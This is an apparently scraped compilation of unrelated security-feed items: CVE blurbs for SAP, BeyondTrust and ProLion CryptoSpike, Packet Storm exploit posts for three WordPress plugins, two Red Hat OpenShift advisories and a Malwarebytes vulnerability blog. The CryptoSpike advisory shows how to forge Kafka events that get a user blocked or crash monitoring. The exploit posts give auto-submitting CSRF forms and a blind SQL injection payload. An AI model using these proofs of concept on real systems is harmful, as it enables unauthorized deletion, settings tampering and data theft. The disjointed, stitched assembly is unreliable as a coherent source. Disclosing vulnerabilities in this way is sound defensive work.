SAP GUI for Windows and SAP GUI for Java - versions SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to create Layout configurations of the ABAP List Viewer and with this causing a mild impact on integrity and availability, e.g. also increasing the response times of the AS ABAP.



CVE-2023-49580

Missing authentication in the internal data streaming system in ProLion CryptoSpike 3.0.15P2 allows remote unauthenticated users to read potentially sensitive information and deny service to users by directly reading and writing data in Apache Kafka (as consumer and producer).

Missing authentication in the internal data streaming system in ProLion CryptoSpike 3.0.15P2 allows remote unauthenticated users to read potentially sensitive information and deny service to users by directly reading and writing data in Apache Kafka (as consumer and producer).  
 

**Introduction**

CryptoSpike leverages the Kafka system in order to communicate the events regarding file access on the NAS storage to the CryptoSpike sub-components involved in the elaboration. By using a Kafka client, it is possible to authenticate on Kafka without authentication from an attacker server and act in _consumer_ or _producer_ mode. In consumer mode it is possible to read from processed events all metadata of operations and files (filename and complete path on the network share, user identifier, date/time, etc.). In producer mode it is even possible to insert forged events that could lead to network shares' users interdiction.

**Steps to reproduce**

The CryptoSpike system is deployed in Active monitoring mode with a configuration consisting of one Leader node and two Agents.

By using the tool "kcat" (also known as Kafka Cat) as client of Kafka service, connect to any one of the Kafka on the CryptoSpike servers in order to find the list of the Kafka "topics":

By connecting through kcat client as _consumer_ without authentication to the Kafka topic **local.cs.fct.file-events.0** on any one of the Kafka services (Leader or Agent), it is possible to capture information about files and storage users. Instead, by connecting as producer it is possible to insert multiple forged events that simulate the file writing of a file with an extension (.YOLO in the example) forbidden by one of the rules. In the next picture, on the left the connection as producer, on the right the connection as consumer:

The fake event written as producer is the following one:

{"eventType":"CREATE","filePath":"/test_FAKE2.YOLO","fileName":"test_FAKE2.YOLO","extension":"YOLO","displayFilePath":"\\\\[REDACTED IP].127\\testshare\\test_FAKE2.YOLO","filePathAfterRename":null,"userId":"S-1-5-21-3279977989-1286463912-761590908-500","userIdType":"WINDOWS","userIp":"[REDACTED IP].127","fileSystemObjectType":"FILE","fileProtocol":"SMB","fileProtocolVersion":"3.1","timestamp":1675681906.343000216,"timestampNano":343000216,"storagePlatform":"ONTAP","clusterId":402,"clusterName":"hq-stor","serverId":502,"serverName":"svm0_cifs","shareId":602,"shareName":"testshare","volumeId":552,"volumeName":"svm0_cifs_root","localAddress":"172.18.0.14","remoteAddress":"[REDACTED IP].55","policyName":"Prolion_CS_POLICY_ACTIVE_cifs","synchronous":true,"accessControlResult":"{\"additionalInformation\":{\"configurationItemId\":\"1552\",\"blockListItem\":\"yolo\"},\"blocked\":true,\"reason\":\"Extension matched.\",\"accessControlType\":\"BLOCK_LIST\",\"userIgnored\":false,\"audited\":true}","accessControlType":"BLOCK_LIST","blocked":true,"userIgnored":false}

All the forged events written from the rogue producer are captured from the system and showed on the management interface of CryptoSpike:

After around one minute of time, the network share user indicated in the forged message is automatically blocked from CryptoSpike, despite this user never executed an operation on the NAS storage:

  

Note: to reproduce the test it is necessary:

*   In case of CIFS shares, the Active Directory instance must be active, and the victim user ID must be known.
*   More than 5 fake messages regarding the fake anomaly must be published to cause the blocking of the user.
*   Each of these 5 messages must have a minimal variation from each one (all the timestamp fields can be set in a way that they are close together and to the current time)

Finally, by inserting as producer inside the Kafka topic a message that is not conforming to expected by CryptoSpike format, it is possible to block the entire system. For example, by sending a JSON with unexpected format ({ "TEST": "TEST" }) or a free text, the storage monitoring function of CryptoSpike is made unavailable. Being the Kafka instances running on the Leader and Agent nodes all synchronized, the unavailability of the service propagates to all the CryptoSpike Event Analyzer containers of the architecture.

cryptoleader:~$ check-services 
=== UNDERREPLICATED SERVICES: 1 ===
REPLICAS   MODE         NAME
0/1        replicated   application\_services\_event\_analyzer

cryptoagent1:/prolion/scripts$ check-services 
=== UNDERREPLICATED SERVICES: 1 ===
REPLICAS   MODE         NAME
0/1        replicated   application\_services\_event\_analyzer

cryptoagent2:/prolion/scripts$ check-services 
=== UNDERREPLICATED SERVICES: 1 ===
REPLICAS   MODE         NAME
0/1        replicated   application\_services\_event\_analyzer

CVE-2023-36648: CVCN

An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. An attacker can spawn a process with multiple users as part of the security token (prior to Avecto elevation). When Avecto elevates the process, it removes the user who is launching the process, but not the second user. Therefore this second user still retains access and can give permission to the process back to the first user.

BeyondTrust is the worldwide leader in intelligent identity and access security, enabling organizations to protect identities, stop threats, and deliver dynamic access. We offer the only platform with both intelligent identity threat detection and a privilege control plane that delivers zero-trust based least privilege to shrink your attack surface and eliminate security blind spots.

*   Solutions
*   Services
*   Blog
*   Resources
*   Manage Cookies
*   Contact Us

*   Facebook
*   Twitter
*   LinkedIn

©2003-2023 BeyondTrust Corporation. All Rights Reserved. Other trademarks identified on this page are owned by their respective owners. BeyondTrust is not a chartered bank or trust company, or depository institution. It is not authorized to accept deposits or trust accounts and is not licensed or regulated by any state or federal banking authority. 11/30/2023

Top

CVE-2020-12613: Privilege Management Release Notes

WordPress Contact Form to Any API plugin versions 1.1.6 and below suffer from a cross site request forgery vulnerability.

    # Exploit Title: WP Plugins Contact Form to Any API <= 1.1.6 - CSRF# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/# Vendor Homepage: https://www.itpathsolutions.com/# Version: 1.1.6# Tested on: Windows, Linux# CVE: CVE-2023-47871# Product DescriptionContact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.# Vulnerability overviewThe Wordpress plugins Contact Form to Any API <= 1.1.6 is vulnerable to Cross-Site Request Forgery in the Delete All Log function. This vulnerability could lead to unauthorized deletion of API Logs.# Proof of Concept<html><body><form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST"><input type="hidden" name="action" value="cf7_to_any_api_bulk_log_delete" /><input type="submit" value="Submit request" /></form><script>history.pushState('', '', '/');document.forms[0].submit();</script></body></html># RecommendationUpgrade to version 1.1.7

WordPress Contact Form To Any API 1.1.6 Cross Site Request Forgery

WordPress Bravo Translate plugin versions 1.2 and below suffer from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins Bravo Translate <= 1.2 - SQL Injection# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/bravo-translate/# Version: 1.2# Tested on: Windows, Linux# CVE: CVE-2023-49161# Product DescriptionThis plugin allow you to translate your monolingual website in a super easy manner. You do not have to bother about .pot .po or .mo files. It safes you a lot of time cause you can effectively transalte thouse texts in a foreign language with just a few clicks gaining productivity. Bravo translate keeps your translations in your database. You dont have to worry about themes or plugins updates because your translations will not vannish.# Vulnerability overview:The WordPress Plugins Bravo Translate <= 1.2 is vulnerable to Blind SQL Injection via the textTo parameter on /wp-json/bravo-translate/BRAVOTRAN_create endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of Concept:Affected Endpoint: /wp-json/bravo-translate/BRAVOTRAN_create?textTo=a&yourTranslation=bAffected Parameter: textTopayload: test',(select%20sleep(5)))%23# RecommendationN/A

WordPress Bravo Translate 1.2 SQL Injection

WordPress TextMe SMS plugin versions 1.9.0 and below suffer from a cross site request forgery vulnerability.

    # Exploit Title: WP Plugins TextMe SMS <= 1.9.0 - CSRF# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/textme-sms-integration/# Version: 1.9.0# Tested on: Windows, Linux# CVE: CVE-2023-48287# Product DescriptionThis plugin allows you to send SMS messages from your WordPress dashboard to the site owner or to your end users.# Vulnerability overviewThe Wordpress plugins TextMe SMS <= 1.9.0 is vulnerable to Cross-Site Request Forgery in the Settings function (Account details and Contact Form 7 Events). This could allow unauthenticated users to trick authenticated users to unintentionally modify the account details and contact form 7 events. This could lead to sensitive data leakage as well as phishing attacks. # Proof of Concept<html>  <body>    <form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="tetxme_update_option_page" />      <input type="hidden" name="data" value="textme_cf7=1&textme_cf7_user=1&textme_cf7_phone_field=0123456789&textme_cf7_user_content=SMS%20Phishing%20Sample" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html># RecommendationUpgrade to version 1.9.1

WordPress TextMe SMS 1.9.0 Cross Site Request Forgery

Red Hat Security Advisory 2023-7710-03 - An update for windows-machine-config-operator-bundle-container and windows-machine-config-operator-container is now available for Red Hat OpenShift Container Platform 4.12. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7710.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenShift for Windows Containers 7.2.0 security updateAdvisory ID:        RHSA-2023:7710-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7710Issue date:         2023-12-11Revision:           03CVE Names:          CVE-2023-5528====================================================================Summary: An update for windows-machine-config-operator-bundle-container and windows-machine-config-operator-container is now available for Red Hat OpenShift Container Platform 4.12.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server nodes.Security Fix(es):* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)* kubernetes: Insufficient input sanitization in in-tree storage plugin leads to privilege escalation on Windows nodes (CVE-2023-5528)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://docs.openshift.com/container-platform/latest/windows_containers/windows-node-upgrades.htmlCVEs:CVE-2023-5528References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003https://bugzilla.redhat.com/show_bug.cgi?id=2243296https://bugzilla.redhat.com/show_bug.cgi?id=2247163https://issues.redhat.com/browse/OCPBUGS-13790https://issues.redhat.com/browse/OCPBUGS-17639https://issues.redhat.com/browse/OCPBUGS-17825https://issues.redhat.com/browse/OCPBUGS-20139https://issues.redhat.com/browse/OCPBUGS-20140https://issues.redhat.com/browse/OCPBUGS-20168https://issues.redhat.com/browse/WINC-1023https://issues.redhat.com/browse/WINC-1033https://issues.redhat.com/browse/WINC-1057https://issues.redhat.com/browse/WINC-1097https://issues.redhat.com/browse/WINC-1108https://issues.redhat.com/browse/WINC-635https://issues.redhat.com/browse/WINC-805https://issues.redhat.com/browse/WINC-948https://issues.redhat.com/browse/WINC-950

Red Hat Security Advisory 2023-7710-03

Red Hat Security Advisory 2023-7709-03 - The components for Red Hat OpenShift for Windows Containers 8.1.1 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7709.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenShift for Windows Containers 8.1.1 security updateAdvisory ID:        RHSA-2023:7709-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7709Issue date:         2023-12-11Revision:           03CVE Names:          CVE-2023-5528====================================================================Summary: The components for Red Hat OpenShift for Windows Containers 8.1.1 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.Security Fix(es):* kubernetes: Insufficient input sanitization in in-tree storage plugin leads to privilege escalation on Windows nodes (CVE-2023-5528)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://docs.openshift.com/container-platform/latest/windows_containers/windows-node-upgrades.htmlCVEs:CVE-2023-5528References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2247163https://issues.redhat.com/browse/OCPBUGS-20259https://issues.redhat.com/browse/OCPBUGS-21768https://issues.redhat.com/browse/OCPBUGS-22748https://issues.redhat.com/browse/WINC-1153

Red Hat Security Advisory 2023-7709-03

Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group.

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Malwarebytes is offering customers its ThreatDown Vulnerability Assessment solution without extra costs to help reduce attack surfaces and improve their security posture

Every day, nearly 70 brand-new vulnerabilities are discovered in software products around the world. That’s almost 25,550 new problems each year, of which roughly 4,250 (or every one-in-six) will be classified as “critical.”

But with little guidance beyond “critical” classifications—and with the potential for non-critical vulnerabilities to still be exploited for devastating malware attacks—resource-constrained IT organizations need help. How can IT teams prioritize amongst potentially thousands of vulnerabilities if they don’t know which to fix first?

Malwarebytes analyzed the vulnerabilities identified by its ThreatDown Vulnerability Assessment module, now included at no additional cost in all ThreaDown bundles, to reveal the most common “critical” and “important” unpatched vulnerabilities on known endpoints.

The vulnerabilities compiled show up across four major software products:

*   Adobe Flash Player
*   Adobe Acrobat Reader
*   VideoLan VLC Media Player
*   Zoom

****The most prevalent vulnerabilities:****

In the 100 most prevalent unpatched vulnerabilities, the majority **(93 out of the 100) are found in software by Adobe, Zoom, and Mozilla.** \[MOU3\] 

No vulnerability listed as critical made it into the top 100 most prevalent vulnerabilities. But one critical vulnerability was close: CVE-2020-9633 in Adobe Flash Player. The vulnerable version of Flash is still in use because Adobe silently introduced a time bomb in later Flash Player versions that would prevent Flash Player from working and playing any Flash content after January 12, 2021. So organizations that have certain Flash content they need to play often to go back to that vulnerable version.

Relatedly, the most prevalent vulnerabilities labeled “Critical” come from a more diverse group of software vendors, with four distinct top contributors:

*   30 % UltraVNC (Server and Viewer)
*   20 % Python (versions 3.6 to 3.10)
*   18% Microsoft (Edge and Visual Studio)
*   14 % Adobe (Flash Player, Acrobat, and Reader)

Read on to see details of the top 5 unpatched critical vulnerabilities and the top 5 unpatched important vulnerabilities, as uncovered by ThreatDown, powered by Malwarebytes.

****The top 5 unpatched CRITICAL vulnerabilities:****

**Adobe Flash Player**

CVE-2020-9633: Adobe Flash Player Desktop Runtime 32.0.0.371 and earlier, Adobe Flash Player for Google Chrome 32.0.0.371 and earlier, and Adobe Flash Player for Microsoft Edge and Internet Explorer 32.0.0.330 and earlier have a use after free vulnerability. Successful exploitation could lead to arbitrary code execution. Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS.

**Zoom:**

CVE-2022-22785: The Zoom Client for Meetings (for Android, iOS, Linux, MacOS, and Windows) before version 5.10.0 failed to properly constrain client session cookies to Zoom domains. This issue could be used in a more sophisticated attack to send an unsuspecting users Zoom-scoped session cookies to a non-Zoom domain. This could potentially allow for spoofing of a Zoom user.

CVE-2022-22786: The Zoom Client for Meetings for Windows before version 5.10.0 and Zoom Rooms for Conference Room for Windows before version 5.10.0, fails to properly check the installation version during the update process. This issue could be used in a more sophisticated attack to trick a user into downgrading their Zoom client to a less secure version.

**Adobe Acrobat Reader**

CVE-2016-1038: Adobe Reader and Acrobat before 11.0.16, Acrobat and Acrobat Reader DC Classic before 15.006.30172, and Acrobat and Acrobat Reader DC Continuous before 15.016.20039 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors. Installing a more recent version eliminates this vulnerability.

CVE-2016-1044: Adobe Reader and Acrobat before 11.0.16, Acrobat and Acrobat Reader DC Classic before 15.006.30172, and Acrobat and Acrobat Reader DC Continuous before 15.016.20039 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors. Installing a more recent version eliminates this vulnerability.

****The top 5 unpatched IMPORTANT vulnerabilities:****

**Zoom:**

CVE-2023-39211: Improper privilege management in Zoom Desktop Client for Windows and Zoom Rooms for Windows may allow an authenticated user to enable an information disclosure via local access. Upgrading to 5.15.5 or later eliminates this vulnerability.

CVE-2023-34116: Improper input validation in the Zoom Desktop Client for Windows may allow an unauthorized user to enable an escalation of privilege via network access. Upgrading to version 5.15.0 or later eliminates this vulnerability.

CVE-2023-39213: Improper neutralization of special elements in Zoom Desktop Client for Windows and Zoom VDI Client may allow an unauthenticated user to enable an escalation of privilege via network access. Upgrading to version 5.15.2 or later eliminates this vulnerability.

**Adobe:**

CVE-2023-29320: Adobe Acrobat Reader versions 23.003.20244 (and earlier) and 20.005.30467 (and earlier) are affected by an Violation of Secure Design Principles vulnerability that could result in arbitrary code execution in the context of the current user by bypassing the API blacklisting feature. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Updating to the latest version eliminates the vulnerability.

**VLC media player**

CVE-2020-26664: A vulnerability in VideoLAN VLC media player 3.0.11 allows attackers to trigger a heap-based buffer overflow via a specially crafted file. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap. A buffer overflow may result in arbitrary code execution. Installing the 3.0.20 release of VLC eliminates the vulnerability.

**You Can’t Fix What You Can’t See**

While only on very rare occasions do vulnerabilities make mainstream news headlines, but when they do, the impact can be enormous. The exploitation of the MOVEit vulnerability by Cl0p ransomware operators impacted over 60 million individual victims (between May and September of 2023. And remember that not every “critical” vulnerability is synonymous with an exploited vulnerability. With an additional 1,000 entries added to CISA’s known, exploited vulnerabilities catalog in just the past two years, few organizations have the IT staff to keep track of everything.

Many organizations only have limited visibility into which vulnerabilities might impact them, and nearly every organization relies on the Common Vulnerabilities and Exposures (CVE) database, which lists publicly disclosed computer security flaws. But this isn’t a perfect resource.

In 2023, CVE-2023-4863 was discovered, originally described as a heap buffer overflow in WebP  within Google Chrome. The average person, upon learning about this vulnerability, may have thought that the problem was limited to Chrome, or maybe even realize that other Chromium based browsers could be affected. Yet the reality was quite different. It turned out that the bug was deeply rooted in the libwebp library, which is not only used by Chrome but by virtually every application that handles WebP images. So anyone that patched their Chrome browser might think they thwarted that vulnerability, when in reality they might still be vulnerable, just in different software.

This type of library oversight happens quite often. Most people, including thoroughly trained and experienced IT staff, have no idea about all the building blocks that were used to create the environment and software that they use.

This is where dedicated software to alert staff about existing vulnerabilities in their environment integrated with patch management capabilities can help save the day.

**Free Vulnerability Assessment**

Today Malwarebytes announced its offering customers its ThreatDown Vulnerability Assessment solution without extra costs to help reduce attack surfaces and improve their security posture. The full featured comprehensive vulnerability scanning is now included in every ThreatDown Bundle at no additional cost via its integrated console.

Learn more about how ThreatDown bundles can help you to improve your security by quickly finding and fixing vulnerabilities here.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

Tag

#windows